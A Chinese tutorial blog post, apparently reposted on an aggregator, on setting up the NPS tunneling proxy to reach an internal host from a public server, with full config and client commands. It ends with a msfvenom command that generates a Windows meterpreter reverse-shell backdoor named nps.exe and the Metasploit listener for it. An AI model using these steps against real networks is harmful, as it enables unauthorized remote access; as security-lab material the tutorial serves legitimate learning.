【内网安全-隧道搭建】内网穿透_Nps配置、上线

这篇具有很好参考价值的文章主要介绍了【内网安全-隧道搭建】内网穿透_Nps配置、上线。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

Nps(自定义上线)

1、简述:

2、工具的配置:

 1、准备:

2、服务端配置:

3、客户端配置

3、工具的使用:

1、web管理界面

2、客户端上线

 3、msf后门


Nps(自定义上线)

1、简述:

1)nps:是一款轻量级、高性能、功能强大的内网穿透代理服务器


2)功能:目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。


3)优点:与Frp类似,但是具有图形化管理界面,更方便配置


4)工具:

client代表客户端:放到内网主机

server代表服务端:放到公网服务器上

(根据内网主机下载)

 Releases · ehang-io/nps (github.com)https://github.com/ehang-io/nps/releases/nps默认密码,0X09【内网安全】,安全,网络,服务器

 注:

错误情况

需要登陆GitHub后,才能下载

如果下载过慢,使用加速器,然后上传到服务器

(有白嫖的加速器)

nps默认密码,0X09【内网安全】,安全,网络,服务器

 nps默认密码,0X09【内网安全】,安全,网络,服务器

 



2、工具的配置:

 1、准备:

1)公网服务器

2)内网主机

3)工具下载

如果不知道自己虚拟机是何种框架

直接在虚拟机设置中查看CD/DVD名称(在名称未改情况下)

4)实验环境

内网Linux-amd-64

服务器centos7

(所以我服务器、客户端就都下的Linux-amd-64)

nps默认密码,0X09【内网安全】,安全,网络,服务器

nps默认密码,0X09【内网安全】,安全,网络,服务器

登陆GitHub+加速器

下载完成 nps默认密码,0X09【内网安全】,安全,网络,服务器

2、服务端配置:

1)上传服务端文件到服务器

nps默认密码,0X09【内网安全】,安全,网络,服务器

我是解压之后上传的

选中文件,右键传输

nps默认密码,0X09【内网安全】,安全,网络,服务器


2)安装Nps

进入到文件夹(使用Xshell

cd /linux_amd64_server

nps默认密码,0X09【内网安全】,安全,网络,服务器

先给nps权限
sudo chmod 777 nps
(不然会报错:被拒绝)
./nps install     #linux
nps.exe install   #windows

 nps默认密码,0X09【内网安全】,安全,网络,服务器


3)修改配置文件

conf--->nps.conf

nps默认密码,0X09【内网安全】,安全,网络,服务器

vim nps.conf

nps默认密码,0X09【内网安全】,安全,网络,服务器


修改的地方:

web的host、账号、密码和端口号

注意:

修改域名代理的端口,避免端口冲突

NPS的web页面默认端口8080,默认账号密码:admin/123

NPS的服务端和客户端进行连接的默认端口是8024(可修改,连接时使用修改后的端口)

NPS服务端开启的端口(即需要访问的VPS的端口)不在配置文件中,在web界面中进行配置

按i进行编辑
(Linux知识点)
appname = nps

#HTTP(S) proxy port, no startup if empty
http_proxy_ip=0.0.0.0
http_proxy_port=80          #域名代理http代理监听端口(修改端口,避免冲突)
https_proxy_port=443        #域名代理https代理监听端口(修改端口,避免冲突)
https_just_proxy=true
#default https certificate setting
https_default_cert_file=conf/server.pem
https_default_key_file=conf/server.key

##bridge
bridge_type=tcp            #客户端与服务端连接的协议
bridge_port=8024           #服务端客户端通信端口(即客户端访问服务端的端口)
bridge_ip=0.0.0.0

# Public password, which clients can use to connect to the server
public_vkey=123        #客户端以配置文件模式启动时的密钥,设置为空表示关闭客户端配置文件连接模式

#Traffic data persistence interval(minute)
#Ignorance means no persistence
#flow_store_interval=1

log_level=7                 #日志输出级别
#log_path=nps.log

#Whether to restrict IP access, true or false or ignore
#ip_limit=true              #是否限制ip访问,true或false或忽略

#p2p
#p2p_ip=127.0.0.1           #服务端IP,使用p2p模式必填
#p2p_port=6000              #p2p模式开启的udp端口

#web
web_host=a.o.com            #需要修改,改为服务器ip
web_username=admin          #web界面管理账号(可修改)
web_password=123            #web界面管理密码(可修改)
web_port = 8080             #web管理端口,访问该端口可以访问NPS后台(可修改)
web_ip=0.0.0.0
web_base_url=               #web管理主路径,用于将web管理置于代理子路径后面
web_open_ssl=false
web_cert_file=conf/server.pem
web_key_file=conf/server.key
# if web under proxy use sub path. like http://host/nps need this.
#web_base_url=/nps

#Web API unauthenticated IP address(the len of auth_crypt_key must be 16)
#Remove comments if needed
#auth_key=test                          #web api密钥
auth_crypt_key =1234567812345678        #获取服务端authKey时的aes加密密钥,16位

#allow_ports=9001-9009,10001,11000-12000

#Web management multi-user login
allow_user_login=false
allow_user_register=false
allow_user_change_username=false


#extension
allow_flow_limit=false
allow_rate_limit=false
allow_tunnel_num_limit=false
allow_local_proxy=false
allow_connection_num_limit=false
allow_multi_ip=false
system_info_display=false

#cache
http_cache=false
http_cache_length=100

#get origin ip
http_add_origin_header=false

#pprof debug options
#pprof_ip=0.0.0.0               #debug pprof 服务端IP
#pprof_port=9999                #debug pprof 端口

#client disconnect timeout
disconnect_timeout=60            #客户端连接超时,单位5s,默认值60(5mins)

改完以后

Esc

再输入:wq+回车

nps默认密码,0X09【内网安全】,安全,网络,服务器


4)启动Nps:

nps start

nps默认密码,0X09【内网安全】,安全,网络,服务器


注意:

问题一:

当启动连接失败的时候

输入:
nps
(会有报错信息)

nps默认密码,0X09【内网安全】,安全,网络,服务器

8024端口被使用了,换一个端口,再重载配置文件,再启动

重载配置文件
./nps reload

失败了

nps默认密码,0X09【内网安全】,安全,网络,服务器


问题二:

在客户端发现连接不上,应该是防火墙问题了

nps默认密码,0X09【内网安全】,安全,网络,服务器


5)后台管理界面可以启动

输入ip:port

nps默认密码,0X09【内网安全】,安全,网络,服务器

 

 

 

3、客户端配置

1)下贼合适内网主机版本的

我直接复制、粘贴到内网主机了

nps默认密码,0X09【内网安全】,安全,网络,服务器


2)端口是否能连接

Linux:./npc -server=ip:port -vkey=服务端的验证密钥
Windows:npc.exe -server=ip:port -vkey=服务端的验证密钥

客户端并还没有生成,这里测试端口是否能连接上

8024端口可以连通,没拒绝访问

注:客户端未生成,服务端的验证密钥也是没有的)

nps默认密码,0X09【内网安全】,安全,网络,服务器

 拒绝就查看配置文件是否设置的一致,服务器端口是否打开


3)修改配置文件

如果修改过,主要是这3个修改

nps默认密码,0X09【内网安全】,安全,网络,服务器



3、工具的使用:

1、web管理界面

1)登陆nps后台

账号密码admin/123

(如果修改了的,使用自己修改的登陆)

换为中文,嘿嘿嘿

nps默认密码,0X09【内网安全】,安全,网络,服务器


2)新建一个客户端

会生成唯一验证密钥,通过密钥将NPS的服务端和客户端连接起来

nps默认密码,0X09【内网安全】,安全,网络,服务器

得到ID、唯一验证密钥nps默认密码,0X09【内网安全】,安全,网络,服务器


3)新增SOCKS代理

填上id、端口

服务端端口8024不能填,因为8024是连接客户端与服务端

我们需要重新写一个端口,访问服务端的这个端口,从而访问到内网

nps默认密码,0X09【内网安全】,安全,网络,服务器

2、客户端上线

1)连接服务端,上线

Linux:./npc -server=ip:port -vkey=后台服务端生成的验证密钥
Windows:npc.exe -server=ip:port -vkey=后台服务端生成的验证密钥

nps默认密码,0X09【内网安全】,安全,网络,服务器

 再次查看服务端后台

已经上线了,实验基本上完成了

nps默认密码,0X09【内网安全】,安全,网络,服务器

2)访问内网主机

使用浏览器设置代理,然后访问内网主机

 3、msf后门

生成后门:

msfvenom -p windows/meterpreter/reverse_tcp lhost=…… lport=3333 -f exe -o nps.exe
(注意是生成win、还是Linux的监听器)

注:lhos:服务器ip、lport:服务器端口)

监听后门:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run
(注意是win、还是Linux的监听器)

注:这个监听端口lport,与本地转发端口一致)文章来源地址https://www.toymoban.com/news/detail-780238.html

到了这里,关于【内网安全-隧道搭建】内网穿透_Nps配置、上线的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • p70 内网安全-域横向内网漫游 Socks 代理隧道技术(NPS、FRP、CFS 三层内网漫游)

    数据来源         本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。   ​ 必要基础知识点: 内外网简单知识 内网 1 和内网 2 通信问题 正向反向协议通信连接问题 内网穿透代理隧道

    2024年02月05日
    浏览(34)
  • 【内网安全-隧道搭建】内网穿透_Frp上线、测试

    目录 Frp(简易上线) 1、简述: 2、工具: 3、使用: 1、准备: 2、服务端(公网): 2、客户端(内网): 3、测试方法: 4、生成后门木马监听: 1) Frp (Fast Reverse Proxy) 是一个免费开源的用于内网穿透的 反向 代理应用,它支持 TCP、UDP 协议 , 也为 HTTP、HTTPS 协议提供了额

    2023年04月08日
    浏览(30)
  • 【内网安全-隧道搭建】内网穿透_Spp上线(全双工通信)

    目录 Spp(特殊协议上线) 1、简述: 2、用法: 1、准备 2、服务器 3、客户机 4、cs、msf 1) 支持的协议: tcp、udp、rudp(可靠udp)、ricmp(可靠icmp)、rhttp(可靠http)、kcp、quic 2) 支持的类型: 双向代理、socks5正向代理、socks5反向代理 3) 外部代理协议 和 内部转发协议 可以

    2024年02月03日
    浏览(32)
  • 使用nps实现内网穿透

    ​ 当我们想把内网的一些资源暴露在公网上时,可以使用内网穿透功能。比如公司的内网服务器,部署了平时需要开发的项目,但是回到家中无法访问,就可以使用内网穿透,将公司内网的接口映射到一台公网的服务器上,用这台公网服务器做转发即可实现在家中也能外网访

    2024年02月11日
    浏览(27)
  • [ Docker ] 部署 nps 和 npc 实现内网穿透

    https://www.cnblogs.com/yeungchie/ nps 原作者已停止维护,现在用 yisier1/nps Docker 镜像 Git 仓库 打开后重点关注下面这几项: 以上是默认的配置,建议改掉。 现在 nps 已经开始运行了。 现在可以在网页端访问 ip_addr:web_port ,并通过用户名 web_username 和密码 web_password 登录后台管理界面

    2023年04月23日
    浏览(68)
  • 内网穿透代理服务器nps使用初探(三)微信小程序内网穿透

    已完成NPS 的部署,部署教程请参照:https://gaoming.blog.csdn.net/article/details/128203454 内网IP 系统 内核 192.168.1.113 win11 windows_amd64_client 公网IP 系统 内核 39.97.238.139 CentOS linux_amd64_server 内网网站(内网机器 192.168.1.113 上部署的 Web 服务,因微信小程序开发需要采用 https 协议, https 端

    2024年02月09日
    浏览(69)
  • NPS(cnlh)内网穿透弱口令与登录爆破漏洞复现-内附自动化脚本

    目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 复现 4.2 POCsuite POC

    2024年02月10日
    浏览(31)
  • 内网穿透NPS和宝塔Nginx配合使用,开启SSL访问本地局域网网络

    并非为了教学,仅供自己记录,方便下次用。所以内容不会刻意花时间写的很细节详细。 1. 服务器NPS配置 NPS install安装后,配置文件会在其他位置,通过是 /etc/nps/nps.conf 目录。 找到进行修改,主要修改的是 http_proxy_port 和 https_proxy_port ,它们使用的端口是80和443,肯定是和

    2024年02月10日
    浏览(37)
  • 【NPS 】1. 服务器端搭建

    一、环境: 二、安装docker + docker-compose 三、安装 nps 服务端 1. 在 /mnt/docker/nps 下创建 docker-compose.yaml 文件  2. 安装 nps 四、登录 1. ip:8800登录,默认 账号密码 admin / 123  2. 修改密码 系统 : CentOS 7.6 64bit 准备文件 : (百度云盘)点击下载 docker下载脚本: get-docker.sh docker国内

    2024年02月15日
    浏览(29)
  • 内网安全:隧道技术详解_第125天:内网安全-隧道技术&smb&icmp&正反向连接&防火墙出入规则上线

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一:CS反向连接上线 - 拿下Win2008 一. 使用转发代理上线创建监听器 二. 上传后门执行上线 隧道技术 - SMB协议 SMB协议介绍 实战二:SMB协议搭建隧道 正向连接 - 拿下

    2024年02月22日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包